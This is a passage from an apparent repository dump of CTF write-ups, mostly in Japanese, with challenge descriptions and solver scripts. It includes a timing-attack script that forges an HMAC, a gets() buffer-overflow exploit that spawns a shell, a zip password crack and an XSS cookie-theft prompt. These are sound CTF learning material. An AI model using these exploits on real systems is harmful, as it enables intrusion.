match\n}\n```\n\n`flag|(flagに対応するbase64)`を入力すればフラグが表示されそうだと分かる。\n\nプログラムを読むと`flagに対応するbase64`は、`flag`を`key`でSHA256変換⇒文字列変換⇒base64変換という流れで計算されている。\n\n```\nflag を squarectf で SHA256 変換 (HMAC方式)\n\n 32500c064e1eb1053b70ea0a6edc4eb5bc6ab25d1316b413f35e6f9a44e6a9ac\n\n文字列変換\n\n 2P..N.±.;pê nÜNµ¼j²]..´.ó^o.D橬\n\nBase64変換\n\n MlAMBk4esQU7cOoKbtxOtbxqsl0TFrQT815vmkTmqaw=\n```\n\nもし、keyの中身が`squarectf`なら`flag|MlAMBk4esQU7cOoKbtxOtbxqsl0TFrQT815vmkTmqaw=`と入力すればフラグが得られるということになる。\n\n* [CyberChef](https://gchq.github.io/CyberChef/#recipe=HMAC(%7B'option':'UTF8','string':'squarectf'%7D,'SHA256')From_Charcode('CRLF',16)To_Base64('A-Za-z0-9%2B/%3D')&input=ZmxhZw)\n\nわざわざ`compare`関数内で`time.Sleep`しているので、デバッグモード内で時間を見ることが重要であると推測。バイト列を先頭から比較していく仕組みになっている。\n\n```go\nfunc compare(s1, s2 []byte) bool {\n\tif len(s1) != len(s2) {\n\t\treturn false\n\t}\n\n\tc := make(chan bool)\n\n\t// multi-threaded check to speed up comparison\n\tfor i := 0; i < len(s1); i++ {\n\t\tgo func(i int, co chan<- bool) {\n\t\t\t// avoid race conditions\n\t\t\ttime.Sleep(time.Duration(((500*math.Pow(1.18, float64(i+1)))-500)/0.18) * time.Microsecond)\n\t\t\tco <- s1[i] == s2[i]\n\t\t}(i, c)\n\t}\n\n\tfor i := 0; i < len(s1); i++ {\n\t\tif <-c == false {\n\t\t\treturn false\n\t\t}\n\t}\n\n\treturn true\n}\n```\n\n試しに、debugの成功時と失敗時の時間を計ってみると明らかに時間差があることが確認できた。\n\n```\n$ nc challenges.2020.squarectf.com 9020\nEnter command: debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ndebug mode enabled\n-----------DEBUG MODE ENABLED-----------\n\nEnter command: debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ncommand: debug, check: 9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ntook 
552108195 nanoseconds to verify hmac\ndebug mode disabled\n\nEnter command: debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ndebug mode enabled\n-----------DEBUG MODE ENABLED-----------\n\nEnter command: debug|8W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ncommand: debug, check: 8W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ntook 712276 nanoseconds to verify hmac\ninvalid hmac\n```\n\n時間の情報をもとに1バイト目から順に確定させていくプログラムを作成した。\n\n```py\nfrom pwn import *\nimport base64\nimport struct\nimport re\n\nconn = remote('challenges.2020.squarectf.com',9020)\n\n# debug mode\nconn.recvuntil('Enter command:',drop=True)\nconn.sendline('debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=')\nconn.recvuntil('Enter command:',drop=True)\n\nresult = [0 for _ in range(2**8)]\n\npayload = b''\n\nfor j in range(1,33):\n\n buf = b'\\x00'*(32-j)\n\n top = [k for k in range(2**8)]\n while len(top) != 1:\n for i in range(2**8):\n if i not in top:\n continue\n data = struct.pack(\"B\",i) # \\x00 - \\xff\n data = payload + data + buf\n b64_data = base64.b64encode(data).decode()\n conn.sendline('flag|' + b64_data)\n conn.recvline()\n msg = conn.recvline().decode() # time info\n varify_time = int(re.sub(r\"\\D\",\"\",msg)) \n result[i] = [varify_time,i]\n print(i,msg,end='') # for debug\n skip = conn.recvuntil('Enter command:',drop=True)\n if(j == 32):\n print(skip) # flag check\n\n sort_result = sorted(result,reverse=True)\n topgroup = [x[1] for x in sort_result][:10] # just in case\n top = [x for x in top if x in topgroup]\n print('top: ', top)\n\n payload += struct.pack(\"B\",top[0])\n print('payload: ', payload)\n```\n\n時間はかかるがフラグを入手。\n\n<!-- flag{d1d_u_t4k3_the_71me_t0_appr3c14t3_my_c0mm4nd5} -->" }, { "alpha_fraction": 0.39715638756752014, "alphanum_fraction": 0.5516587495803833, "avg_line_length": 17.508771896362305, "blob_id": "c713c6b33ed82094fddafa87f2162d87b3aec085", "content_id": "40a8b1b0f8900afcc1fa69c5bf2bb5248c3c417a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/2020/CyberSecurityRumble2020/Hashfun/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のPythonプログラムが与えられる。\n\n```py\nfrom secret import FLAG\n\ndef hashfun(msg):\n digest = []\n for i in range(len(msg) - 4):\n digest.append(ord(msg[i]) ^ ord(msg[i + 4]))\n return digest\n\nprint(hashfun(FLAG))\n# [10, 30, 31, 62, 27, 9, 4, 0, 1, 1, 4, 4, 7, 13, 8, 12, 21, 28, 12, 6, 60]\n```\n\nコメント行部分が出力であると推測できる。\n\n`hashfun()`の動作は以下の通り。\n\n* `ord()`でASCIIコード(10進)に変換\n\n`CSR{flag}` ⇒ `67 83 82 123 102 108 97 103 125`\n\n* 4つ先の文字とXORを計算\n\n`67(C) ^ 102(f) = 37`, \n`83(S) ^ 108(l) = 63`, \n`82(R) ^ 97(a) = 51`, \n`123({) ^ 103(g) = 28`, \n`102(f) ^ 125(}) = 27` \n\n`hashfun('CSR{flag}') = [37, 63, 51, 28, 27]`\n\nつまり、`67(c) ^ ???(?) = 10` の `???`を求められればよい。\n\nXORは2回作用させると元に戻る性質があるので、`10 ^ 67 = ??? 
= 73(I)` となる。\n\n* [競技プログラミングにおけるXORのTips](https://qiita.com/kuuso1/items/778acaa7011d98a3ff3a)\n\n`FLAG`を求めるプログラムを作成\n\n```py\ndigest = [10, 30, 31, 62, 27, 9, 4, 0, 1, 1, 4, 4, 7, 13, 8, 12, 21, 28, 12, 6, 60]\nchar = 'CSR{'\n\ni = 0\nfor d in digest:\n x = chr(d ^ ord(char[i]))\n char += x\n i += 1\n\nprint(char)\n```\n\n<!-- CSR{IMMERDIESEMATHEMATIK} -->\n" }, { "alpha_fraction": 0.7788944840431213, "alphanum_fraction": 0.7889447212219238, "avg_line_length": 27.571428298950195, "blob_id": "f13ee0a85f4263606fc2f2fa1c9e288707626fe0", "content_id": "8d5bb518bbf545b682e4021708e81bc4bf43428e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 89, "num_lines": 7, "path": "/2020/WaniCTF/zero_size_png/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "この画像のサイズは本当に0×0ですか?\n\n[PNG イメージヘッダ(IHDR)](https://www.setsuki.com/hsp/ext/chunk/IHDR.htm)\n\n[dyson.png](https://score.wanictf.org/storage/blhzcdzthleicibsouicbwdxctrnrtgy/dyson.png)\n\nWriter : takushooo" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7512820363044739, "avg_line_length": 34.45454406738281, "blob_id": "e0bd3ad19de18c98719b8e6f6e46dba79d11f431", "content_id": "8b1eb53d7b8648ee7660b5aae9c624e1b9530821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 390, "license_type": "no_license", "max_line_length": 229, "num_lines": 11, "path": "/2021/BCACTF_2.0/Cipher_Mishap/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My Caeser-loving friend decided to send me a text file, but before sending it, his sister, who loves Caps Lock, tampered with the file. Can you help me find out what my friend sent me? 
Note: the answer must be wrapped in bcactf{}\n\n[text.txt](https://objects.bcactf.com/bcactf2/cipher-mishap/text.txt)\n\nHint 1 of 2\n\nHis sister hates base 10.\n\nHint 2 of 2\n\nMight Y and N relate to Caps Lock?\n" }, { "alpha_fraction": 0.3052631616592407, "alphanum_fraction": 0.7105262875556946, "avg_line_length": 30.66666603088379, "blob_id": "068f94acf1b31a997011f5c40fd72b7b4ae93f0a", "content_id": "f4a3e3acca8f652880488a5f5a6dab2ae7291e3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 90, "num_lines": 6, "path": "/2021/WaniCTF21-spring/execute/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "value = [7941081424088616006, 7311705455698409823, 3560223458505028963, 35295634984951667]\n\nflag = \"\"\nfor v in value:\n flag += bytes.fromhex(hex(v)[2:]).decode('utf-8')[::-1]\nprint(flag)\n" }, { "alpha_fraction": 0.692139744758606, "alphanum_fraction": 0.7445414662361145, "avg_line_length": 21.899999618530273, "blob_id": "e828e162b6c264709358fd819a702e94c68369da", "content_id": "daccfcfae6c79f92e92773ea823040aa9a6f632f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 588, "license_type": "no_license", "max_line_length": 61, "num_lines": 20, "path": "/2021/BCACTF_2.0/Secure_Zip/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nパスワード付きのzipファイルが与えられる。\n\n```bash\n$ zip2john chall.zip > chall_hash\n\n$ john chall_hash --wordlist=rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (PKZIP [32/64])\nWill run 16 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\ndogedoge (chall.zip)\n```\n\njohn the ripper で解析すると、パスワードは`dogedoge`であることが分かった。\n\nzipファイル内のテキストにフラグが書かれていた。\n\n<!-- bcactf{cr4ck1ng_z1p_p455w0rd5_15_fun_a12ca37bdacef7} -->\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 14.399999618530273, "blob_id": "0166d4d4e81efc5277d970049ea952503b8e6659", "content_id": "b30299e3bc17c86979181c8f222e816c82140f20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 78, "license_type": "no_license", "max_line_length": 38, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/Robots/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Robots are taking over. 
Find out more.\n\n34.69.61.54:5247\n\nAuthor: f1rehaz4rd\n\n" }, { "alpha_fraction": 0.7666666507720947, "alphanum_fraction": 0.7666666507720947, "avg_line_length": 30, "blob_id": "a96e1450783d96bc11b8bf85bac076b9d6cd5514", "content_id": "ce09ec41de0e6b7544bda0df24766cf4d36ee2b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 30, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/2021/Real_World_CTF_3rd/HOME/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "No need to wear a mask at HOME" }, { "alpha_fraction": 0.7729257345199585, "alphanum_fraction": 0.8122270703315735, "avg_line_length": 31.714284896850586, "blob_id": "260967adce3b9202aa6d51ee31b6bdb940ea421f", "content_id": "b6e760d08c64ae6f53b6449794c77a668242ae2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 261, "license_type": "no_license", "max_line_length": 105, "num_lines": 7, "path": "/2021/WaniCTF21-spring/exception/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "API Gateway, Lambda, S3, CloudFront, CloudFormationを使ってアプリを作ってみました。\n\nhttps://exception.web.wanictf.org/\n\n[web-exception.zip](https://score.wanictf.org/storage/2q8kwrpnq1aej8zm9iv2aualbofz49cp/web-exception.zip)\n\nWriter : suuhito\n" }, { "alpha_fraction": 0.6933333277702332, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 27.25, "blob_id": "a78e22eb51677f0ee8f3ce07dea13c218953d321", "content_id": "5f2e71720e1865beb5cac09bdc0aab9ad811704c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 228, "license_type": "no_license", "max_line_length": 109, "num_lines": 8, "path": "/2021/Zh3r0_CTF_V2/A_Small_Maniacs_game/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "![](img/unknown.png)\n\nA game that zh3r0 guys asked for 😥\nNote: Solve all the levels and then click submit the solution button and wait for 40 seconds to get the flag.\n\nLink - [asmg](https://asmg.zh3r0.cf/)\n\nAuthor - wh1t3r0se" }, { "alpha_fraction": 0.42595309019088745, "alphanum_fraction": 0.5439882874488831, "avg_line_length": 25.25, "blob_id": "779892a9671e371b7eb176d191fd25c52054e226", "content_id": "07ff7a71c85aaa50dc06475441e7280bc8e6ec66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1364, "license_type": "no_license", "max_line_length": 492, "num_lines": 52, "path": "/2021/BCACTF_2.0/􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "cipher = open(\"ciphertext.md\",\"rb\").read()\n\nbyte = []\nfor i,c in enumerate(cipher):\n if(c == 0xf4):\n if(cipher[i:i+4] not in byte):\n byte.append(cipher[i:i+4])\n\nbyte = sorted(byte)\n\n# byte = [b'\\xf4\\x80\\xb4\\xa0', b'\\xf4\\x81\\xab\\x9e', b'\\xf4\\x83\\x84\\x8f', b'\\xf4\\x83\\x97\\x81', b'\\xf4\\x84\\xa7\\xbb', b'\\xf4\\x84\\xba\\xb7', b'\\xf4\\x86\\x86\\x97', b'\\xf4\\x86\\x96\\x93', b'\\xf4\\x86\\x9e\\x8e', b'\\xf4\\x87\\xba\\x9f', b'\\xf4\\x87\\xbd\\x9b', b'\\xf4\\x89\\x82\\xab', b'\\xf4\\x89\\x97\\xbd', b'\\xf4\\x89\\xaf\\x93', b'\\xf4\\x8a\\xb6\\xac', b'\\xf4\\x8a\\xb8\\x89', b'\\xf4\\x8b\\x84\\x9a', b'\\xf4\\x8b\\x90\\x9d', b'\\xf4\\x8c\\x98\\x97', b'\\xf4\\x8c\\xb2\\x94', b'\\xf4\\x8c\\xb6\\xb4', b'\\xf4\\x8f\\x95\\x88', b'\\xf4\\x8f\\x9f\\x9f']\nchar = [ \"(\" + str(i) + \")\" for i in 
range(len(byte))]\n\n# guess from result\nchar[11] = \"h\"\nchar[10] = \"t\"\nchar[2] = \"p\"\nchar[1] = \"s\"\nchar[8] = \"b\"\nchar[5] = \"c\"\nchar[4] = \"a\"\nchar[20] = \"f\"\nchar[15] = \"e\"\nchar[19] = \"u\"\nchar[3] = \"r\"\nchar[7] = \"o\"\nchar[9] = \"n\"\nchar[12] = \"d\" \nchar[17] = \"l\"\nchar[6] = \"i\"\nchar[21] = \"w\"\nchar[22] = \"k\"\nchar[16] = \"g\"\nchar[14] = \"v\"\nchar[13] = \"y\"\nchar[0] = \"j\"\nchar[18] = \"m\"\n\ntranslate = dict(zip(byte,char))\n\nplain = \"\"\ncnt = 0\nwhile(cnt < len(cipher)):\n c = cipher[cnt]\n if(c == 0xf4):\n plain += translate[cipher[cnt:cnt+4]]\n cnt += 4\n else:\n plain += chr(cipher[cnt])\n cnt += 1\n\nprint(plain)" }, { "alpha_fraction": 0.6112080216407776, "alphanum_fraction": 0.7171827554702759, "avg_line_length": 35.69599914550781, "blob_id": "725b8c0011d52874b1997f466bce588f153ec01b", "content_id": "8cf608c1716d6e87230a1f1369448e0baa08866b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5171, "license_type": "no_license", "max_line_length": 140, "num_lines": 125, "path": "/2021/redpwnCTF_2021/beginner-generic-pwn-number-0/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```c\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n\n\nconst char *inspirational_messages[] = {\n \"\\\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\\\"\",\n \"\\\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\\\"\",\n \"\\\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\\\"\",\n};\n\nint main(void)\n{\n srand(time(0));\n long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *));\n char heartfelt_message[32];\n \n setbuf(stdout, NULL);\n setbuf(stdin, NULL);\n setbuf(stderr, NULL);\n\n puts(inspirational_messages[inspirational_message_index]);\n puts(\"rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!\");\n puts(\"can you write me a heartfelt message to cheer me up? 
:(\");\n\n gets(heartfelt_message);\n\n if(inspirational_message_index == -1) {\n system(\"/bin/sh\");\n }\n}\n```\n\ngetsでバッファオーバーフローを起こし、`inspirational_message_index`変数を書き換えればよい。\n\ngdb-pedaでoffsetを調べたところ、40であることが分かった。\n\n\n```\n[----------------------------------registers-----------------------------------]\nRAX: 0x7fffffffdde0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRBX: 0x4012c0 (<__libc_csu_init>: endbr64)\nRCX: 0x7ffff7faf980 --> 0xfbad208b\nRDX: 0x0\nRSI: 0x7ffff7fafa03 --> 0xfb24d0000000000a\nRDI: 0x7ffff7fb24d0 --> 0x0\nRBP: 0x7fffffffde10 (\"bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRSP: 0x7fffffffdde0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRIP: 0x4012a5 (<main+175>: )\nR8 : 0x7fffffffdde0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nR9 : 0x0\nR10: 0x400513 --> 0x6172730073746567 ('gets')\nR11: 0x246\nR12: 0x401110 (<_start>: endbr64)\nR13: 0x7fffffffdf00 --> 0x1\nR14: 0x0\nR15: 0x0\nEFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x401299 <main+163>: lea rax,[rbp-0x30]\n 0x40129d <main+167>: mov rdi,rax\n 0x4012a0 <main+170>: call 0x4010f0 <gets@plt>\n=> 0x4012a5 <main+175>:\n cmp QWORD PTR [rbp-0x8],0xffffffffffffffff\n 0x4012aa <main+180>: jne 0x4012b8 <main+194>\n 0x4012ac <main+182>:\n lea rdi,[rip+0xf35] # 0x4021e8\n 0x4012b3 <main+189>: call 0x4010c0 <system@plt>\n 0x4012b8 <main+194>: mov eax,0x0\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffdde0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0008| 0x7fffffffdde8 (\"ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0016| 0x7fffffffddf0 (\"AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0024| 0x7fffffffddf8 (\"(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0032| 0x7fffffffde00 (\"A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0040| 0x7fffffffde08 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0048| 0x7fffffffde10 (\"bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0056| 0x7fffffffde18 (\"AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n0x00000000004012a5 in main ()\nValue returned is $1 = 0x7fffffffdde0 \"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\"\ngdb-peda$ xi $rbp-0x8\n0x7fffffffde08 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nVirtual memory mapping:\nStart : 0x00007ffffffde000\nEnd : 0x00007ffffffff000\nOffset: 0x1fe08\nPerm : rw-p\nName : [stack]\ngdb-peda$ patto AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\nAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 40\n```\n\n`rbp-0x8`を`0xffffffffffffffff`にすればよいので、40 + 8 = 48 バイトの`\\xff`を送信する。\n\n```py\nfrom pwn import *\n\nio = remote('mc.ax', '31199')\nio.sendline(b'\\xff' * (40 + 8))\nio.interactive()\n```\n\n```\n$ python3 solver.py\n\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪\n𝘴 𝘸𝘦𝘦𝘬\"\nrob inc has had some serious layoffs lately 
and i have to do all the beginner pwn all my self!\ncan you write me a heartfelt message to cheer me up? :(\n$ ls\nflag.txt\nrun\n$ cat flag.txt\nflag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}\n[*] Got EOF while reading in interactive\n$\n```\n\n<!-- flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me} -->" }, { "alpha_fraction": 0.6263736486434937, "alphanum_fraction": 0.7637362480163574, "avg_line_length": 35.599998474121094, "blob_id": "66d5ecee07e1deb3e2f6b1649e6c5b634437a46a", "content_id": "1e7ffa181ba9b6b03e09bb9b8c7b7e5d8563b5e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 85, "num_lines": 5, "path": "/2020/kksctf_open_2020/not_a_terminator/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "You will not able to solve this, until you have your skin on. Arnie will confirm it.\n\n[pic.png](https://tasks.kksctf.ru/tasks/27856a0f-6db1-41b5-95c9-82f914797798/pic.png)\n\n@bork_dog" }, { "alpha_fraction": 0.6106870174407959, "alphanum_fraction": 0.7938931584358215, "avg_line_length": 86.66666412353516, "blob_id": "3dd67134ee36a7d8cbfab6f3176e8ed424c9b583", "content_id": "8b49b0543e2ee1791ea1c9b1d536c31b411c1e89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 262, "license_type": "no_license", "max_line_length": 249, "num_lines": 3, "path": "/2021/angstromCTF_2021/Fish/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Oh, fish! My [dinner](https://files.actf.co/4665ad469663cc5471232826797a19b9eb315255c8246f5a0ce7257d7ca88947/fish.png) has turned transparent again. What will I eat now that I can't eat that yummy, yummy, fish head, mmmmmm head of fish mm so good...\n\nAuthor: kmh" }, { "alpha_fraction": 0.2871452271938324, "alphanum_fraction": 0.409015029668808, "avg_line_length": 17.75, "blob_id": "8b1acd0d6a4dc06def4f2f20c886223591bc3ca6", "content_id": "c1c9dfe3cfb20bc7bfc8f1a88d44315be6531167", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 601, "license_type": "no_license", "max_line_length": 74, "num_lines": 32, "path": "/2020/HITCON_CTF_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# HITCON CTF 2020\n\n* https://ctf.hitcon.org/\n\n* 2020/11/28 11:00 JST — 2020/11/29 23:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------ | -------------------- | ----: | -----: |\n| reverse | [Welcome](Welcome) | ssh | 50 | 715 |\n| forensics | [AC1750](AC1750) | CVE-2020-10882, pcap | 168 | 100 |\n\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| --- | ------- | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 218 points\n\n* 104 / 1216\n\n* 104 / 710 (> 1 pt)" }, { "alpha_fraction": 0.7032967209815979, "alphanum_fraction": 0.7967032790184021, "avg_line_length": 35.400001525878906, "blob_id": "91ca3283ad08d8ee16584033d1140ed71d6c8992", "content_id": "2daf05e4d1fb2215b3dd54691e53ae3d52da16ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 105, "num_lines": 5, "path": "/2021/DawgCTF_2021/Really_Secure_Algorithm/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I like my e's like I like my 
trucks: big and obnoxious\n\nAuthor: trashcanna\n\n[reallysecure.txt](https://umbccd.io/files/7a6c56544bb1aaf47ccddfecc7450100/reallysecure.txt?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjI3fQ.YJYUag.i9HaG2E2tAUrFByPCsBcs05vmG8)\n" }, { "alpha_fraction": 0.7433962225914001, "alphanum_fraction": 0.800000011920929, "avg_line_length": 19.384614944458008, "blob_id": "35aeaf474c397ad463dd5bd64d285129fde40226", "content_id": "3e89347071b081a7c4f0e7e14ed14e5e0c585e24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 367, "license_type": "no_license", "max_line_length": 115, "num_lines": 13, "path": "/2021/WaniCTF21-spring/Wani_Request_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "XSS Challenge !!\n\nhttps://request2.web.wanictf.org/\n\nチャレンジは二つです。\n\nあどみんちゃんのクッキーを手に入れてください。\n\nWani Request 1 と同じくRequestBinなどを利用してみましょう。\n\n[web-wani-request-2.zip](https://score.wanictf.org/storage/q0c2ayte115oluup2ju6ojjpnp45rk69/web-wani-request-2.zip)\n\nWriter : nkt\n" }, { "alpha_fraction": 0.8102564215660095, "alphanum_fraction": 0.8102564215660095, "avg_line_length": 27, "blob_id": "584add6ba5f2c500aa3749c82bd342c7e4c7b598", "content_id": "466928d46974747a8f66e05415a44e2ec8e7809b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 261, "license_type": "no_license", "max_line_length": 89, "num_lines": 7, "path": "/2020/WaniCTF/chunk_eater/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "pngの必須チャンクをワニ博士が食べてしまいました!\n\n[PNGファイルフォーマット](https://www.setsuki.com/hsp/ext/png.htm)\n\n[eaten.png](https://score.wanictf.org/storage/enqebuvmdzcpqlevyhdasrtfsfwiuyuu/eaten.png)\n\nWriter : takushooo" }, { "alpha_fraction": 0.2703389823436737, "alphanum_fraction": 0.345762699842453, "avg_line_length": 41.14285659790039, "blob_id": "c8600c86c26feca0cb59b0e57dcfe89a8ef71ceb", "content_id": "7f354a96399cf79a0880630268f9f3573525ae1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 100, "num_lines": 28, "path": "/2021/RaRCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# RaRCTF 2021\n\n* https://ctf.rars.win/\n\n* 2021/08/07 02:00 JST - 2021/08/10 02:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------- | ------------------------------ | ----: | -----: |\n| Pwn | [Archer](Archer) | | 100 | 223 |\n| Reversing | [Dotty](Dotty) | Base32 | 150 | 189 |\n| Web | [Secure Uploader](Secure_Uploader) | os.path.join | 150 | 145 |\n| Crypto | [babycrypt](babycrypt) | RSA, n%(p-1) | 200 | 110 |\n| Crypto | [minigen](minigen) | XOR | 100 | 158 |\n| Crypto | [sRSA](sRSA) | | 100 | 224 |\n| Crypto | [unrandompad](unrandompad) | RSA, Håstad's Broadcast Attack | 150 | 90 |\n| Reversing | [verybabyrev](verybabyrev) | XOR | 100 | 235 